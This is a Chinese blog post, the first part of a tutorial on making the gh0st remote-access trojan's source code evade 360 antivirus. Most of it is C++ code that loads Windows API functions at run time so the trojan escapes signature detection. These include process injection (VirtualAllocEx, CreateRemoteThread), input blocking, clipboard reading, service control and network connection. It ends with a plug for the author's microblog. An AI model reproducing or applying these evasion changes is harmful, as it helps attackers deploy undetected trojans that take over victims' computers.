网络安全：gh0st源码免杀360全套(1)

    360安全卫士 v8.0 +360杀毒v2.0，过360安全卫士提示比较复杂，我们最后一个章节讲这个 ，这次主要是过360表面免杀(dll,dat,exe免杀)。需要免杀的函数如下：

 

RegisterServiceCtrlHandlerAT pRegisterServiceCtrlHandlerA

=(RegisterServiceCtrlHandlerAT)GetProcAddress(LoadLibrary("Advapi32.dll"),"RegisterServiceCtrlHandlerA");

 

SetServiceStatusT pSetServiceStatus

= (SetServiceStatusT)GetProcAddress(LoadLibrary("Advapi32.dll"),"SetServiceStatus");

 

SetUnhandledExceptionFilterT pSetUnhandledExceptionFilter

=(SetUnhandledExceptionFilterT)GetProcAddress(LoadLibrary("Kernel32.dll"),"SetUnhandledExceptionFilter");

 

GetCursorInfoT pGetCursorInfo

= (GetCursorInfoT)GetProcAddress(LoadLibrary("user32.dll"),"GetCursorInfo");

 

BlockInputT pBlockInput

= (BlockInputT)GetProcAddress(LoadLibrary("user32.dll"),"BlockInput");

 

SetCursorPosT pSetCursorPos

= (SetCursorPosT)GetProcAddress(LoadLibrary("user32.dll"),"SetCursorPos");

 

SetCaptureT pSetCapture

= (SetCaptureT)GetProcAddress(LoadLibrary("user32.dll"),"SetCapture");

 

mouse_eventT pmouse_event

= (mouse_eventT)GetProcAddress(LoadLibrary("user32.dll"),"mouse_event");

 

GetClipboardDataT pGetClipboardData

= (GetClipboardDataT)GetProcAddress(LoadLibrary("user32.dll"),"GetClipboardData");

 

GlobalSizeT pGlobalSize

= (GlobalSizeT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"GlobalSize");

 

CloseWindowT pCloseWindow

= (CloseWindowT)GetProcAddress(LoadLibrary("user32.dll"),"CloseWindow");

 

OpenProcessT pOpenProcess

= (OpenProcessT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"OpenProcess");

 

WideCharToMultiByteT pWideCharToMultiByte

=(WideCharToMultiByteT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"WideCharToMultiByte");

 

ExpandEnvironmentStringsAT pExpandEnvironmentStringsA

=(ExpandEnvironmentStringsAT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"ExpandEnvironmentStringsA");

 

VirtualAllocExT pVirtualAllocEx

= (VirtualAllocExT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"VirtualAllocEx");

 

CreateRemoteThreadT pCreateRemoteThread

=(CreateRemoteThreadT)GetProcAddress(LoadLibrary("KERNEL32.dll"),"CreateRemoteThread");

 

ControlServiceT pControlService

= (ControlServiceT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"ControlService");

 

OpenServiceAT pOpenServiceA

= (OpenServiceAT)GetProcAddress(LoadLibrary("Advapi32.dll"),"OpenServiceA");

 

DeleteServiceT pDeleteService

= (DeleteServiceT)GetProcAddress(LoadLibrary("Advapi32.dll"),"DeleteService");

 

CloseServiceHandleT pCloseServiceHandle

= (CloseServiceHandleT)GetProcAddress(LoadLibrary("ADVAPI32.dll"),"CloseServiceHandle");

 

下面几个函数比较难免杀，我就把函数体给写出来

 

typedef DWORD (STDAPICALLTYPE *SHDeleteKeyAT)(HKEY,LPCTSTR);

SHDeleteKeyAT pSHDeleteKeyA

= (SHDeleteKeyAT)GetProcAddress(LoadLibrary("SHLWAPI.dll"),"SHDeleteKeyA");

 

typedef BOOL (_stdcall *InternetReadFileT)

(

    __in HINTERNET hFile,

    __out_bcount(dwNumberOfBytesToRead) LPVOID lpBuffer,

    __in DWORD dwNumberOfBytesToRead,

    __out LPDWORD lpdwNumberOfBytesRead

);

InternetReadFileT pInternetReadFile

= (InternetReadFileT)GetProcAddress(LoadLibrary("Wininet.dll"),"InternetReadFile");

 

ICDecompressEnd  -> ICSendMessage

ICSendMessageT pICSendMessage

= (ICSendMessageT)GetProcAddress(LoadLibrary("MSVFW32.dll"),"ICSendMessage");

 

ICCompressGetFormat(m_hIC, m_lpbmiInput, &m_bmiOutput);

pICSendMessage(m_hIC, ICM_COMPRESS_GET_FORMAT, (DWORD_PTR)(LPVOID)(m_lpbmiInput), (DWORD_PTR)(LPVOID)(&m_bmiOutput));

 

strcmpiT pstrcmpi

= (strcmpiT)GetProcAddress(LoadLibrary("shlwapi.dll"),"strcmpi");

 

typedef struct hostent FAR * (WSAAPI *gethostbynameT)

(

 IN const char FAR * name

);

gethostbynameT pgethostbyname

= (gethostbynameT)GetProcAddress(LoadLibrary("Ws2_32.dll"),"gethostbyname");

connectT pconnect

= (connectT)GetProcAddress(LoadLibrary("Ws2_32.dll"),"connect");

 

 

我最近在玩和讯微博，很方便，很实用，你也来和我一起玩吧！
去看看我的微博吧！http://t.hexun.com/3006897/default.html